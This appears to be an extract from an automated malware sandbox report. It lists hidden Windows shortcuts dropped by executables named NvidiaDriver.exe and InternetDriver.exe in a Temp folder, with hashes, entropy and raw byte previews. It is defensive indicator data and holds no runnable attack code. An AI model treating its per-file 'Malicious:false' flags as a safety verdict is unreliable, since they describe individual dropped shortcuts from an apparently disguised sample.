                                                                                                                                          SHA-512:11078E144A8E7581E136B47F72CB936CDD013D7C95EF192641AFB016A49066C85F0E6E032AE559ADB6D710AC7C7F0F7631B05633AD96FEB3362D884CBF113E82
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I.. 58..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:38 2024, mtime=Sun Dec 8 16:06:38 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1228
                                                                                                                                          Entropy (8bit):4.920773279990392
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8GNetq43HR6JgKAPpNcAwmfm1dJNmN3CRSqyFm:8GNetVRtNbwakdJEAyF
                                                                                                                                          MD5:E956E610CE9911593B4419F0615EA62D
                                                                                                                                          SHA1:CD28C7466DFA1D0193D19A0EF0CA879A0726B4BD
                                                                                                                                          SHA-256:525646B8E16DA92E48CEDFA11C6C0C5990188669FE34968274A1B663106CCC17
                                                                                                                                          SHA-512:F80189F367F381E8EB62F389854241D017BABFDEAD9BC62543039475E92C1E844135EFE4633066DA77EF4D758DA044D02048D9E50642AC03D04506CC09B6130C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."....bX..I...bX..I.......I...d......................0.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...............................N.v.i.d.i.a.D.r.i.v.e.r.....r.2..d...Y.".INTERN~1.EXE..V......Y..Y...........................zY..I.n.t.e.r.n.e.t.D.r.i.v.e.r...e.x.e.......p...............-.......o.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe..<.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.I.n.t.e.r.n.e.t.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... .k[......,.......hT..CrF.f4... .k
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:42 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.936767718582114
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HgBetq43HR6JgKAGsK2TXAqmfmOKm3EjkqyFm:8ABetVRbf0qa0PjtyF
                                                                                                                                          MD5:6581DA6A233B4180150BA662C6920CE9
                                                                                                                                          SHA1:6073F49E554D48F68845D0FE092A2994839AE511
                                                                                                                                          SHA-256:3A35E3B77B46EC5A68673C55B799B08507FEABBD0529A1343376CF657A8CAD1C
                                                                                                                                          SHA-512:68D9660FD55EB77B7D0BF3AAE07610A88EE49294E376B52942063B60736286FD6E914FFF4595C6748435C5C8EEA81278B65ABBD21ABCC00FBCF8D77CBE33C07E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I.......I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:50 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.935112108972403
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HroBetq43HR6JgKA5PK2TXAqmfmOKm3EjkqyFm:8kBetVRVf0qa0PjtyF
                                                                                                                                          MD5:159922389748AD7A87DD2B3005BF7D4A
                                                                                                                                          SHA1:F713D407649FEF8EB458A62178A09620EB831050
                                                                                                                                          SHA-256:E587FDD54C95525C96B0B58C98E0EA76B7BD1B81632D4AD8A76EA03C0AD13B9B
                                                                                                                                          SHA-512:BA4B4D3A61F1C7494C5ABB72C1745305AF456FB6D09026015F892F4E45D5407EBB618522D22F39A649C69CCC60FCD6E9633336E9EC22275150B9764247E28504
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I..$...I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:52 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.9279037080414225
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nilBetq43HR6JgKA5PK2TXAqmfmOKlNmN3EjkqyFm:8ilBetVRVf0qa0lECjtyF
                                                                                                                                          MD5:DAEF171C75760A768732D1C24373DFD6
                                                                                                                                          SHA1:2D7C077A51F0587CE5AD3C1E059A0666CB4ED772
                                                                                                                                          SHA-256:EBC7E877AB5631CD05B666B8FFC01F46CD5378B52FFF308D6672BA7C33F222B7
                                                                                                                                          SHA-512:007AFBDD05031239979E44326FDB8E06F48892B7AD7C872B80416BA222B690316D7EE5F51793BE858CA0EC806A5F5A25ADFC4059AB817D593C6DCF8F101E8B81
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I..nN...I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:48 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.939471978996979
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HsBetq43HR6JgKAGsK2TXAqmfmOKm3EjkqyFm:8MBetVRbf0qa0PjtyF
                                                                                                                                          MD5:F99496FFA8CB12BF2EF15BE611684D37
                                                                                                                                          SHA1:C680093F12140C233694ECFDA3CD516F46B5D09F
                                                                                                                                          SHA-256:0B7B382145522C83A43F98140CA8EEDFD690EF97733D2D9740F130577573F8D5
                                                                                                                                          SHA-512:D7D01A8472A08177D16E63985391471AE7B11F80F578439131D3CCEC065342DB6F06400D3643FDD5FAB2E1C6D6929A5B610FC5141A6776D843A1AB2E6A4321DA
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I...%..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:50 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.929734899469113
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nPBetq43HR6JgKA5PK2TXAqmfmOKlNmN3EjkqyFm:8PBetVRVf0qa0lECjtyF
                                                                                                                                          MD5:85FC168B80C322F866E0CD2151AE9ACA
                                                                                                                                          SHA1:70FFE24B2F740B793141A668F0F074E634CC6AE0
                                                                                                                                          SHA-256:86121D178D54B46FF8C0F4C10B2692EFCFBE214425438A33921564AEF268E81B
                                                                                                                                          SHA-512:3C36A8E09AF1838C500330EBF426B1A7BAC8E305AF2C5A3B3A7A96CCF5F27FA097427545E95DA013CAB7EE34F96BA94D2945FEB13BAAB8BEB996CE3C83D00401
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I...p...I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:39 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.932614776560447
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nkBetq43HR6JgKAGsK2TXAqmfmOKlNmN3EjkqyFm:8kBetVRbf0qa0lECjtyF
                                                                                                                                          MD5:DC71DE47B42073CAD82D19DBA060EDD4
                                                                                                                                          SHA1:A38FD4A1B6C8750D6930C0509EA9167E810FC6F7
                                                                                                                                          SHA-256:8A0089BA535039D626592020EA8D674AA184C1246D08F3F8834797B6F5E68FF0
                                                                                                                                          SHA-512:6E936A983716CA6C58053B3CA47326BC8BCA58CA4772E07671F4587184A54F46953586243021A91F5E8BC2AD54D0E6BCF185EED8419912E639484149E8C73CC4
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I.......I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:44 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.9399637210517975
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HxBetq43HR6JgKAGsK2TXAqmfmOKm3EjkqyFm:8RBetVRbf0qa0PjtyF
                                                                                                                                          MD5:F9ECAA4583EDE4EC1F6BB31D816311DE
                                                                                                                                          SHA1:FE4118A8E5FAE66925BDE721137140DA1398CEAF
                                                                                                                                          SHA-256:9693468491CE2C72DC3D2F53ECCF6983F4DB26996778CC508D8CE86EB2CB0525
                                                                                                                                          SHA-512:6105625ADED835B3C29444B18729314F34503169AA07AD3320082C71AFDCF7B006924FFAAC7331B0439E94A56D14E21A786A71A238F3158103CCA971AED956A9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I..w.:..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:56 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.927442105646314
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nW2Betq43HR6JgKA5PK2TXAqmfmOKlNmN3EjkqyFm:8RBetVRVf0qa0lECjtyF
                                                                                                                                          MD5:1D17E301367296CB8FB67B1FE1EAC1DD
                                                                                                                                          SHA1:ABE7C351BA892AB0159CECAD7796AA3A1779E891
                                                                                                                                          SHA-256:B03497728B6E58D2A5EA84595291AE5037F76DEEFBC7C68ED650272C319C59AD
                                                                                                                                          SHA-512:FE722352B6D92704742DC9BD3064A7DD843A9CAAD3AE56E4A0D380DBEFD167EF9228ADBF56BD174FF1BA7E2FAAD958B47366306D49F15C31DAF7CA76CBE6908D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I...WS..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:42 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.933637036410888
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nE2Betq43HR6JgKAGsK2TXAqmfmOKlNmN3EjkqyFm:8E2BetVRbf0qa0lECjtyF
                                                                                                                                          MD5:7ECF3EF79740222EC0B8C5331B58B874
                                                                                                                                          SHA1:D8A31329BB88A6775F0E5CC2831C6D92E4D52D55
                                                                                                                                          SHA-256:D626D88F7A4FFBAB73185BCD9DA954FE16A5A17F5015F50CE2062439243A0BB5
                                                                                                                                          SHA-512:12D844B7824EEA8C9D58B523CEEB2CC028979AE6FEE714C5E89B46146A4AD2FBF9157646B3C41C877B81DC6EE493F3590449657AFD8E15D2DE960088119EFF8E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I...~...I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:53 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.936912634741496
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8Hy/pBetq43HR6JgKA5PK2TXAqmfmOKm3EjkqyFm:80BetVRVf0qa0PjtyF
                                                                                                                                          MD5:8AB13C3FAED54FD6CE066FAA7746998F
                                                                                                                                          SHA1:826AFBE19668C76D3AD42A085A9C6687D8DDB7B0
                                                                                                                                          SHA-256:B2F1B255802EE19F477FE5264645870AA364D4A5606AD4BAEF611308EBA7C7A4
                                                                                                                                          SHA-512:6931A49E1E914E1E19E80EF37474E64589BFBD675038BF3E383351759A3715820BFCFFC339D126D18EBC85CB89B74D19E98E2B1E899C8D11FE63478509130057
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I...2h..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:56 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.935568981043915
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HeBetq43HR6JgKA5PK2TXAqmfmOKm3EjkqyFm:8+BetVRVf0qa0PjtyF
                                                                                                                                          MD5:CD09D972808FCC413C5B1F9B89AFAAA4
                                                                                                                                          SHA1:48C3A06D4237BA2335F6E86E4D9A89DA79BD5C11
                                                                                                                                          SHA-256:F69471EE0D69E8EA05361F4EC54897E08E40C89EEFF6E4853943C25337CE651A
                                                                                                                                          SHA-512:9E407C41BBFAEEC60ACC7A66DB052F36F108BC5275B97B86E5ECFD195E662CE2E376762F41E8ACCE9EEC8FBC5B2E1ADFF6692F387C2FE10930BE916EA64678E6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I....X..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:37 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.926830550719154
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HKBfjq43HR6JgKAQUK2TXAqmfmOKm3EjkqyFm:8qBfjVRRf0qa0PjtyF
                                                                                                                                          MD5:51E90F0FB8702F207B7441511EAF2A09
                                                                                                                                          SHA1:BD144AFF71323FF2077DC9D3185CB6127B239FE2
                                                                                                                                          SHA-256:9FF49E018B0F4BCBE841B9B5E915F5C825F41488D3CE557F61322378B52AD29C
